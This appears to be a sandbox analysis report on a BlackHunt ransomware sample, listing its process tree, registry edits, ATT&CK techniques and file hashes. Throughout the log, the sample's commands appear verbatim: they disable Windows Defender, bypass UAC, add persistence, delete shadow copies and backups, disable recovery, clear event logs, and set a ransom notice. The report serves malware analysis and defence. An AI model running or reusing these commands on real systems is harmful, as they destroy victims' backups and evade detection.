51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 52 PID 2860 wrote to memory of 2632 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 52 PID 2860 wrote to memory of 2632 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 52 PID 2860 wrote to memory of 2464 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 55 PID 2860 wrote to memory of 2464 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 55 PID 2860 wrote to memory of 2464 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 55 PID 2860 wrote to memory of 2464 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 55 PID 2700 wrote to memory of 2492 2700 cmd.exe 56 PID 2700 wrote to memory of 2492 2700 cmd.exe 56 PID 2700 wrote to memory of 2492 2700 cmd.exe 56 PID 2860 wrote to memory of 2516 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe 57 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe"C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2860 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2464
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2184
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2884
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3068
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2180
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1884
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1848
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2768
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2236
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe" /F2⤵PID:972
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe" /F3⤵
- Creates scheduled task(s)
PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:596
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:268
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:108
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1372
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1072
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:580
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:784
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2360
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2380
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1876
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5440
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:5392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5428
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:5336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5344
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4400
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5212
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4628
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:4904
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:5124
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:5508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:5360
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:5832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4908
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:5860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5464
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5460
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5456
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4700
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5008
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4844
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:4912
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:5676
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe"2⤵
- Deletes itself
PID:5756 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:5520
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:6008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5820
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:5764
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2143865160558505714-951798863323846685-3172112052369306921877588032-481563123"1⤵PID:2888
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2016
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3188
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5f9a4fd033e1cda1224fa4f45bfe30421
SHA1019dbcfa64aa66086d81a3c156e4fa6d5c305772
SHA256a1678bdff15a3951c16d8a022a4e79893e2344564439b75b6cecde9f72a00fc7
SHA5120a125e8a78d6b73cd0cec21a1e521a2ea1dcfa72230eac7cdb8ee9e57ffac4330dd16503d80175d3f3cc7fe9cb9a0ba0de4f6d5fa612d7a0900fc3ab3fc2cd14
-
Filesize
1KB
MD5e4be6000224f7629c7201a499c81bb9e
SHA131f0ef6c5807ecdab87090c00852a8ca42a9cacd
SHA2561b2567249f83f4cf12fd0bf4d557ddb2618124a617c5444470030059b743f98a
SHA512f9ec118d8a13126e91049e7f030ae0bf2ff86e80ee94650ee378cc26258295f32b42c11e1922f5cd16bf0a0154d6cbc6e20cdce5cd1894ba69aec4656688611d
-
Filesize
684B
MD51f6f543be03e7c672ba79ee103dc199c
